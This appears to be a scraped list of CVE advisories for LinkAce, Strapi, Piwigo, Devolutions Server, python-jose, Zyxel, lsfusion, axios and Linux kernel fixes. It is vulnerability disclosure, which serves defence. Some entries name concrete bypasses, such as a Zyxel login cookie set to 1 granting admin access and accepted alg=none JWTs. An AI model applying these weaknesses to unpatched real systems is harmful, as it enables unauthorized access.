| CVE |
Vendors |
Products |
Updated |
CVSS v3.1 |
| LinkAce is a self-hosted archive to collect website links. In versions 2.3.1 and below, the social media sharing functionality contains a Stored Cross-Site Scripting (XSS) vulnerability that allows any authenticated user to inject arbitrary JavaScript by creating a link with malicious HTML in the title field. When a user views the link details page and the shareable links are rendered, the malicious JavaScript executes in their browser. This vulnerability affects multiple sharing services and can be exploited to steal session cookies, perform actions on behalf of users, or deliver malware. This issue is fixed in version 2.4.0. |
| In the Linux kernel, the following vulnerability has been resolved:
iio: adc: ad7173: fix channels index for syscalib_mode
Fix the index used to look up the channel when accessing the
syscalib_mode attribute. The address field is a 0-based index (same
as scan_index) that it used to access the channel in the
ad7173_channels array throughout the driver. The channels field, on
the other hand, may not match the address field depending on the
channel configuration specified in the device tree and could result
in an out-of-bounds access. |
| Strapi is an open source headless content management system. Strapi versions prior to 5.20.0 contain a CORS misconfiguration vulnerability in default installations. By default, Strapi reflects the value of the Origin header back in the Access-Control-Allow-Origin response header without proper validation or whitelisting. This allows an attacker-controlled site to send credentialed requests to the Strapi backend. An attacker can exploit this by hosting a malicious site on a different origin (e.g., different port) and sending requests with credentials to the Strapi API. The vulnerability is fixed in version 5.20.0. No known workarounds exist. |
| Piwigo is a full featured open source photo gallery application for the web. In Piwigo 15.6.0, using the password reset function allows sending a password-reset URL by entering an existing username or email address. However, the hostname used to construct this URL is taken from the HTTP request's Host header and is not validated at all. Therefore, an attacker can send a password-reset URL with a modified hostname to an existing user whose username or email the attacker knows or guesses. This issue has been patched in version 15.7.0. |
| In the Linux kernel, the following vulnerability has been resolved:
crypto: x86/aegis - Add missing error checks
The skcipher_walk functions can allocate memory and can fail, so
checking for errors is necessary. |
| In the Linux kernel, the following vulnerability has been resolved:
dm: dm-crypt: Do not partially accept write BIOs with zoned targets
Read and write operations issued to a dm-crypt target may be split
according to the dm-crypt internal limits defined by the max_read_size
and max_write_size module parameters (default is 128 KB). The intent is
to improve processing time of large BIOs by splitting them into smaller
operations that can be parallelized on different CPUs.
For zoned dm-crypt targets, this BIO splitting is still done but without
the parallel execution to ensure that the issuing order of write
operations to the underlying devices remains sequential. However, the
splitting itself causes other problems:
1) Since dm-crypt relies on the block layer zone write plugging to
handle zone append emulation using regular write operations, the
reminder of a split write BIO will always be plugged into the target
zone write plugged. Once the on-going write BIO finishes, this
reminder BIO is unplugged and issued from the zone write plug work.
If this reminder BIO itself needs to be split, the reminder will be
re-issued and plugged again, but that causes a call to a
blk_queue_enter(), which may block if a queue freeze operation was
initiated. This results in a deadlock as DM submission still holds
BIOs that the queue freeze side is waiting for.
2) dm-crypt relies on the emulation done by the block layer using
regular write operations for processing zone append operations. This
still requires to properly return the written sector as the BIO
sector of the original BIO. However, this can be done correctly only
and only if there is a single clone BIO used for processing the
original zone append operation issued by the user. If the size of a
zone append operation is larger than dm-crypt max_write_size, then
the orginal BIO will be split and processed as a chain of regular
write operations. Such chaining result in an incorrect written sector
being returned to the zone append issuer using the original BIO
sector. This in turn results in file system data corruptions using
xfs or btrfs.
Fix this by modifying get_max_request_size() to always return the size
of the BIO to avoid it being split with dm_accpet_partial_bio() in
crypt_map(). get_max_request_size() is renamed to
get_max_request_sectors() to clarify the unit of the value returned
and its interface is changed to take a struct dm_target pointer and a
pointer to the struct bio being processed. In addition to this change,
to ensure that crypt_alloc_buffer() works correctly, set the dm-crypt
device max_hw_sectors limit to be at most
BIO_MAX_VECS << PAGE_SECTORS_SHIFT (1 MB with a 4KB page architecture).
This forces DM core to split write BIOs before passing them to
crypt_map(), and thus guaranteeing that dm-crypt can always accept an
entire write BIO without needing to split it.
This change does not have any effect on the read path of dm-crypt. Read
operations can still be split and the BIO fragments processed in
parallel. There is also no impact on the performance of the write path
given that all zone write BIOs were already processed inline instead of
in parallel.
This change also does not affect in any way regular dm-crypt block
devices. |
| In the Linux kernel, the following vulnerability has been resolved:
dm: Always split write BIOs to zoned device limits
Any zoned DM target that requires zone append emulation will use the
block layer zone write plugging. In such case, DM target drivers must
not split BIOs using dm_accept_partial_bio() as doing so can potentially
lead to deadlocks with queue freeze operations. Regular write operations
used to emulate zone append operations also cannot be split by the
target driver as that would result in an invalid writen sector value
return using the BIO sector.
In order for zoned DM target drivers to avoid such incorrect BIO
splitting, we must ensure that large BIOs are split before being passed
to the map() function of the target, thus guaranteeing that the
limits for the mapped device are not exceeded.
dm-crypt and dm-flakey are the only target drivers supporting zoned
devices and using dm_accept_partial_bio().
In the case of dm-crypt, this function is used to split BIOs to the
internal max_write_size limit (which will be suppressed in a different
patch). However, since crypt_alloc_buffer() uses a bioset allowing only
up to BIO_MAX_VECS (256) vectors in a BIO. The dm-crypt device
max_segments limit, which is not set and so default to BLK_MAX_SEGMENTS
(128), must thus be respected and write BIOs split accordingly.
In the case of dm-flakey, since zone append emulation is not required,
the block layer zone write plugging is not used and no splitting of BIOs
required.
Modify the function dm_zone_bio_needs_split() to use the block layer
helper function bio_needs_zone_write_plugging() to force a call to
bio_split_to_limits() in dm_split_and_process_bio(). This allows DM
target drivers to avoid using dm_accept_partial_bio() for write
operations on zoned DM devices. |
| Improper access control in secure message component in Devolutions Server allows an authenticated user to steal unauthorized entries via the secure message entry attachment feature
This issue affects the following versions :
* Devolutions Server 2025.2.2.0 through 2025.2.4.0
*
Devolutions Server 2025.1.11.0 and earlier |
| Use of weak credentials in emergency authentication component in Devolutions Server allows an unauthenticated attacker to bypass authentication via brute forcing the short emergency codes generated by the server within a feasible timeframe.
This issue affects the following versions :
* Devolutions Server 2025.2.2.0 through 2025.2.3.0
*
Devolutions Server 2025.1.11.0 and earlier |
| python-jose thru 3.3.0 allows JWT tokens with 'alg=none' to be decoded and accepted without any cryptographic signature verification. A malicious actor can craft a forged token with arbitrary claims (e.g., is_admin=true) and bypass authentication checks, leading to privilege escalation or unauthorized access in applications that rely on python-jose for token validation. This issue is exploitable unless developers explicitly reject 'alg=none' tokens, which is not enforced by the library. NOTE: all parties agree that the issue is not relevant because it only occurs in a "verify_signature": False situation. |
| Improper access control in user group management in Devolutions Server 2025.1.7.0 and earlier allows a non-administrative user with both "User Management" and "User Group Management" permissions to perform privilege escalation by adding users to groups with administrative privileges. |
| Improper authorization in the temporary access workflow of Devolutions Server 2025.2.12.0 and earlier allows an authenticated basic user to self-approve or approve the temporary access requests of other users and gain unauthorized access to vaults and entries via crafted API requests. |
| On Zyxel NBG2105 V1.00(AAGU.2)C0 devices, setting the login cookie to 1 provides administrator access. |
| In the Linux kernel, the following vulnerability has been resolved:
wifi: ath10k: shutdown driver when hardware is unreliable
In rare cases, ath10k may lose connection with the PCIe bus due to
some unknown reasons, which could further lead to system crashes during
resuming due to watchdog timeout:
ath10k_pci 0000:01:00.0: wmi command 20486 timeout, restarting hardware
ath10k_pci 0000:01:00.0: already restarting
ath10k_pci 0000:01:00.0: failed to stop WMI vdev 0: -11
ath10k_pci 0000:01:00.0: failed to stop vdev 0: -11
ieee80211 phy0: PM: **** DPM device timeout ****
Call Trace:
panic+0x125/0x315
dpm_watchdog_set+0x54/0x54
dpm_watchdog_handler+0x57/0x57
call_timer_fn+0x31/0x13c
At this point, all WMI commands will timeout and attempt to restart
device. So set a threshold for consecutive restart failures. If the
threshold is exceeded, consider the hardware is unreliable and all
ath10k operations should be skipped to avoid system crash.
fail_cont_count and pending_recovery are atomic variables, and
do not involve complex conditional logic. Therefore, even if recovery
check and reconfig complete are executed concurrently, the recovery
mechanism will not be broken.
Tested-on: QCA6174 hw3.2 PCI WLAN.RM.4.4.1-00288-QCARMSWPZ-1 |
| In the Linux kernel, the following vulnerability has been resolved:
drm/msm: Add error handling for krealloc in metadata setup
Function msm_ioctl_gem_info_set_metadata() now checks for krealloc
failure and returns -ENOMEM, avoiding potential NULL pointer dereference.
Explicitly avoids __GFP_NOFAIL due to deadlock risks and allocation constraints.
Patchwork: https://patchwork.freedesktop.org/patch/661235/ |
| A vulnerability was determined in lsfusion platform up to 6.1. Affected by this vulnerability is the function UploadFileRequestHandler of the file platform/web-client/src/main/java/lsfusion/http/controller/file/UploadFileRequestHandler.java. Executing manipulation of the argument sid can lead to path traversal. The attack can be executed remotely. The exploit has been publicly disclosed and may be utilized. |
| In the Linux kernel, the following vulnerability has been resolved:
s390/ism: fix concurrency management in ism_cmd()
The s390x ISM device data sheet clearly states that only one
request-response sequence is allowable per ISM function at any point in
time. Unfortunately as of today the s390/ism driver in Linux does not
honor that requirement. This patch aims to rectify that.
This problem was discovered based on Aliaksei's bug report which states
that for certain workloads the ISM functions end up entering error state
(with PEC 2 as seen from the logs) after a while and as a consequence
connections handled by the respective function break, and for future
connection requests the ISM device is not considered -- given it is in a
dysfunctional state. During further debugging PEC 3A was observed as
well.
A kernel message like
[ 1211.244319] zpci: 061a:00:00.0: Event 0x2 reports an error for PCI function 0x61a
is a reliable indicator of the stated function entering error state
with PEC 2. Let me also point out that a kernel message like
[ 1211.244325] zpci: 061a:00:00.0: The ism driver bound to the device does not support error recovery
is a reliable indicator that the ISM function won't be auto-recovered
because the ISM driver currently lacks support for it.
On a technical level, without this synchronization, commands (inputs to
the FW) may be partially or fully overwritten (corrupted) by another CPU
trying to issue commands on the same function. There is hard evidence that
this can lead to DMB token values being used as DMB IOVAs, leading to
PEC 2 PCI events indicating invalid DMA. But this is only one of the
failure modes imaginable. In theory even completely losing one command
and executing another one twice and then trying to interpret the outputs
as if the command we intended to execute was actually executed and not
the other one is also possible. Frankly, I don't feel confident about
providing an exhaustive list of possible consequences. |
| A vulnerability was found in lsfusion platform up to 6.1. Affected is the function DownloadFileRequestHandler of the file web-client/src/main/java/lsfusion/http/controller/file/DownloadFileRequestHandler.java. Performing manipulation of the argument Version results in path traversal. Remote exploitation of the attack is possible. The exploit has been made public and could be used. |
| In the Linux kernel, the following vulnerability has been resolved:
mm: swap: fix potential buffer overflow in setup_clusters()
In setup_swap_map(), we only ensure badpages are in range (0, last_page].
As maxpages might be < last_page, setup_clusters() will encounter a buffer
overflow when a badpage is >= maxpages.
Only call inc_cluster_info_page() for badpage which is < maxpages to fix
the issue. |
| axios is a promise based HTTP client for the browser and node.js. The issue occurs when passing absolute URLs rather than protocol-relative URLs to axios. Even if baseURL is set, axios sends the request to the specified absolute URL, potentially causing SSRF and credential leakage. This issue impacts both server-side and client-side usage of axios. This issue is fixed in 1.8.2. |